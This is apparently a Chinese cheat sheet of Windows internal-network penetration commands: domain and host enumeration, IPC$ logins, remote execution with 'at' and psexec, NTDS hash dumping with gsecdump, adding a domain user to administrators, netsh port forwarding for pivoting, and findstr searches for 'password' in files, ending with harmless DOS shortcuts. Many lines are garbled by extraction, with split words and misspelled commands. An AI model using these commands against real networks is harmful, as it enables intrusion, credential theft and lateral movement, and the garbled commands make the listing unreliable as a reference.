内网渗透命令大全
1.域常用操作命令: |
|
net group /domain |
//获得所有域用户组列表 |
net group qq_group /domain |
//显示域中 qq_group 组的成员 |
net group qq_group /del /domain |
//删除域中 qq_group 组 |
net group qq_group qq /del /domain |
//删除域内 qq_group 群组中的成员 QQ |
net group qq_group /add /domain |
//增加域中的群组 |
net group "domain admins" /domain |
//获得域管理员列表 |
net group "enterprise admins" /domain |
//获得企业管理员列表 |
net localgroup administrators /domain |
//获取域内置 administrators 组用(enterprise admins、 domain admins) |
net group "domain controllers" /domain |
//获得域控制器列表 |
net group "domain computers" /domain |
//获得所有域成员计算机列表 |
net user /domain |
//获得所有域用户列表 |
net user someuser /domain |
//获得指定账户 someuser 的详细信息 |
net accounts /domain |
//获得域密码策略设置,密码长短,错误锁定等信息 |
nei view /domain |
//查询有几个域, 查询域列表 |
net view /domain:testdomain |
//查看 testdomain 域中的计算机列表 |
nltest /domain_trusts |
//获取域信任信息 |
net user domain-admin /domain |
//查看管理员登陆时间,密码过期时间,是否有登陆脚本, 组分配等信息 |
net config Workstation |
//查询机器属于哪个域 |
net time /domian |
//查询主域服务器的时间 |
echo %logonserver% |
//查看登陆到这台服务器的计算机名 |
net time \\192.168.1.1 |
//查询远程共享主机 192.168.1.1 的时间 |
net use \\IP\ipc$ password /user:userna me@domain |
//ipc$域内连接 |
net view \\dc2.backlion.com |
//查看域控共享情况 |
dir \\dc2.backlion.com\SYSVOL /s / a > sysvol.txt |
//列出 sysvol 日志记录 |
xcopy \\dc2.backlion.com\sysvol.txt sysvo l.txt /i /e /c |
//远程拷贝到本地 sysvol 日志 |
net user /domain bk bk123 |
//修改域内用户密码,需要管理员权限 |
net localgroup administartors SE ZKL\backlion /add |
//将 SEZKL 域中的用户 backlion 添加到 administrators 组中 |
mstsc /admin |
//远程桌面登录到 console 会话解决 hash 无法抓出问题 |
gpupdate/force |
//更新域策略 |
psexec \\192.168.1.3 -u administrator - p bk1234 -c gsecdump.exe -u |
//从域服务器密码存储文件 windows/ntds/ntds.dit 导出 h ash 值出来 |
gsecdump -a |
//获取域登管理员登录过得 hash 值,这里 gescdump 为第 三方导出 AD 域的 hash 值 |
tasklist /S ip /U domain\username / P /V |
//查看远程计算机进程列 |
2.基本内网渗透命令: |
|
ipconfig/all |
//查看 IP 地址 |
ipconfig /release |
//释放地址 |
ipconfig /renew |
重新获取 Ip 地址 |
whoami |
//查询账号所属权限 |
whoami/all |
//查看 sid 值 |
systeminfo |
//查询系统以及补丁信息 |
tasklist /svc |
//查看进程 |
taskkill /im 进程名称(cmd) |
//结束进程 |
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程) |
wmic qfe get hotfixid |
//查看已安装过得补丁,这个很实用 |
wmic qfe list full /format:htable > h otfixes.htm |
//详细的补丁安装 |
wmic qfe |
//查询补丁信息以及微软提供的下载地址 |
ping hostname(主机名) |
//显示该机器名的 IP |
net start |
//查看当前运行的服务 |
net user |
//查看本地组的用户 |
net localhroup administrators |
//查看本机管理员组有哪些用户 |
net user |
//查看会话 |
net session |
//查看当前会话 |
net share |
//查看 SMB 指向的路径[即共享] |
wmic share get name,path |
//查看 SMB 指向的路径 |
wmic nteventlog get path,filename,writea ble |
//查询系统日志文件存储位置 |
net use \\IP\ipc$ password /user:us ername |
//建立 IPC 会话(工作组模式) |
net use z: \\192.168.1.1 |
//建立映射到本机 Z 盘 |
net time \\172.16.16.2 |
//查询共享主机的是 |
at \\172.16.16.2 13:50 c:\windows\2009.e xe |
//在共享主机上执行 |
netstat -ano |
//查看开放的端口 |
netstat -an | find “3389” |
//找到 3389 端口 |
net accounts |
//查看本地密码策略 |
nbtstat –A ip |
//netbiso 查询 |
net view |
//查看机器注释或许能得到当前活动状态的机器列 禁用 netbios 就查看不出来 |
echo %PROCESSOR_ARCHITECTURE% |
//查看系统是 32 还是 64 位 |
set |
//查看系统环境设置变量 |
net start |
//查看当前运行的服务 |
wmic service list brief |
//查看进程服务 |
3.内网网络结常用命令: |
|
tracert IP |
//路由跟踪 |
route print |
//打印路由表 |
arp -a |
//列出本网段内所有活跃的 IP 地址 |
arp -s (ip + mac) |
//绑定 mac 与 ip 地址 |
arp -d (ip + mac) |
//解绑 mac 与 ip 地址 |
nbtscan -r 192.168.16.0/24 |
//通过小工具 nbtscan 扫描整个网络 |
netsh firewall show config |
//查看防火墙策略 |
netsh firewall show state |
//查看防火墙策略 |
for /l %i in (1,1,255) do @ping 10.0. 0.%i -w 1 -n 1 | find /i"ttl" |
//批量扫描内网存活主机 |
windows自带端口转发: |
|||||
netsh |
interface |
ipv6 install |
|
//首先安装 IPV6(xp、2003 下 IPV6 必须安装,否则 发不可用!) |
|
netsh interface portproxy add v4tov4 l istenaddress=0.0.0.0 listenport=22connecta ddress=1.1.1.1 connectport=22 |
//将本机 22 到 1.1.1.1 的 22 |
||||
netsh interface portproxy add v4tov4 l istenaddress=192.168.193.1listenport=22 co nnectaddress=8.8.8.8 connectport=22 |
|
||||
netsh interface portproxy add v4tov4 l istenaddress=192.168.193.1listenport=22 co nnectaddress=www.baidu.com connectport=22 |
|
||||
netsh |
interface |
portproxy show |
all |
// |
查看转发配置 |
netsh interface portproxy delete v4tov 4 listenaddress=0.0.0.0listenport=22 |
//删除配置 |
||||
netsh firewall set portopening protocol =tcp port=22 name=Forwardmode=enable sco pe=all profile=all |
//添加防火墙规则,允许连接 22: |
findstr /si password *.xml *.ini *.txt |
//查看后缀名文件中含有 password 关键字的文件 |
findstr /si login *.xml *.ini *.txt |
//查看后缀名文件中含有 login 关键字的文件 |
copy con 创建命令: |
|
copy con ftp.bat |
//创建 ftp.bat 批处理,然后输入 ifconfig 等命令 r+z 退出,并创建成功 |
copy con test.vbs |
//创建 test.vbs 脚本,输入脚本后,按 ctr+z 退出 建成功 |
5.dsquery的 AD 查询工具: |
|
dsquery user domainroot -limit 65535 & & net user /domain |
//列出该域内所有用户名 |
dsquery server -domain super.com | dsg et server -dnsname -site |
//搜索域内所有域控制器并显示他们的 DNS 主机名 名称 |
dsquery contact |
//寻找目录中的联系人 |
dsquery subnet |
//列出该域内网段划分 |
query user |
//查询那些用户在线 |
dsquery group && net group /domain |
//列出该域内分组 |
dsquery ou |
//列出该域内组织单位 |
dsquery server && net time /domain |
//列出该域内域控制器 |
dsquery site -o rdn |
//搜索域中所有站点的名称 |
dsquery group dc=super,dc=com |more |
//搜索在 DC=SUPER,DC=COM 域中的所有组 |
psloggedon.exe |
//查询那台主机和用户登录到该主机上 |
netsess.exe //192.168.1.115 |
//远程主机上无需管理员权限,查询到主机名和用户 |
reg query "HKEY_CURRENT_USER\SOFTWARE\MIC ROSOFT\TERMINAL SERVERCLIENT\DEFAULT" |
//获取最近 mstsc 登录的记录 |
6.DOS 常用快捷命令 |
|
mspaint |
画图工具 |
calc |
计算器 |
notepad |
记事本 |
taskmgr |
任务管理器 |
osk |
打开屏幕键盘 |
gpedit.msc |
组策略 |
services.msc |
本地服务 |
compmgmt.msc |
计算机管理 |
devmgmt.msc |
设备管理器 |
winver |
查看系统版本 |
magnify |
放大镜实用程序 |
eventvwr |
事件查看器 |
Regedit |
打开注册表 |
resmon |
资源监视器 |
WMIC BIOS get release date |
查看电脑生产日期 |
mstsc -f |
远程连接(可以全屏) |